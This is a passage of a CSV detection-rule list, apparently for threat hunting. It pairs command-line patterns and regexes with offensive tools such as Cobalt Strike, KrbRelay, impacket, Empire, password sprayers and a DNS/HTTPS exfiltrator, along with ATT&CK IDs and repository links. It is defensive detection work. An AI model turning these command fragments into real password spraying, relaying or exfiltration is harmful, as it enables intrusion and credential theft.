Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "* spawnto_x64 *",".{0,1000}\sspawnto_x64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* spawnto_x86 *",".{0,1000}\sspawnto_x86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* spellgen.py *",".{0,1000}\sspellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* spellstager.py *",".{0,1000}\sspellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* -spn cifs* -session * -clsid * -secrets*",".{0,1000}\s\-spn\scifs.{0,1000}\s\-session\s.{0,1000}\s\-clsid\s.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "* -spn cifs/* -hashes*",".{0,1000}\s\-spn\scifs\/.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -SpooferIP *",".{0,1000}\s\-SpooferIP\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --spoofppid --ppid *",".{0,1000}\s\-\-spoofppid\s\-\-ppid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "* SpoolFool *.dll",".{0,1000}\sSpoolFool\s.{0,1000}\.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* spoolsploit *",".{0,1000}\sspoolsploit\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* --spray *--shuffle-users*",".{0,1000}\s\-\-spray\s.{0,1000}\-\-shuffle\-users.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* spray -ep ex-plan.s365*",".{0,1000}\sspray\s\-ep\sex\-plan\.s365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --spray --passwords *",".{0,1000}\s\-\-spray\s\-\-passwords\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --spray --push-locked --months-only --exclude *",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only\s\-\-exclude\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --spray --push-locked --months-only*",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --spraypassword *",".{0,1000}\s\-\-spraypassword\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "* SQLITE_DATABASE=chaos*",".{0,1000}\sSQLITE_DATABASE\=chaos.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "* --sql-shell*",".{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* srde_arm_musl https -*",".{0,1000}\ssrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_armv7 https -*",".{0,1000}\ssrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_debug https -*",".{0,1000}\ssrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_linux https -*",".{0,1000}\ssrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_linux_aarch64 https -*",".{0,1000}\ssrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_linux_x86_64 https -*",".{0,1000}\ssrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_macos https -*",".{0,1000}\ssrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_release https -*",".{0,1000}\ssrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_windows https -*",".{0,1000}\ssrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_windows_x64 https -*",".{0,1000}\ssrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_windows_x86 https -*",".{0,1000}\ssrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*",".{0,1000}\sSRVHOST\=127\.0\.0\.1\sSRVPORT\=4444\sRAND\=12345.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -sS -p- --min-rate=* -Pn*",".{0,1000}\s\-sS\s\-p\-\s\-\-min\-rate\=.{0,1000}\s\-Pn.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing (stealphy mode)","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh2-enum-algos.nse*",".{0,1000}\sssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-auth-methods.nse*",".{0,1000}\sssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-brute.nse*",".{0,1000}\sssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-hostkey.nse*",".{0,1000}\sssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-log4shell.nse*",".{0,1000}\sssh\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* ssh-publickey-acceptance.nse*",".{0,1000}\sssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-run.nse*",".{0,1000}\sssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sshv1.nse*",".{0,1000}\ssshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-ccs-injection.nse*",".{0,1000}\sssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-cert.nse*",".{0,1000}\sssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-cert-intaddr.nse*",".{0,1000}\sssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-date.nse*",".{0,1000}\sssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-dh-params.nse*",".{0,1000}\sssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-enum-ciphers.nse*",".{0,1000}\sssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-heartbleed.nse*",".{0,1000}\sssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-known-key.nse*",".{0,1000}\sssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssl-poodle.nse*",".{0,1000}\sssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2.nse*",".{0,1000}\ssslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2-drown.nse*",".{0,1000}\ssslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SspiUacBypass 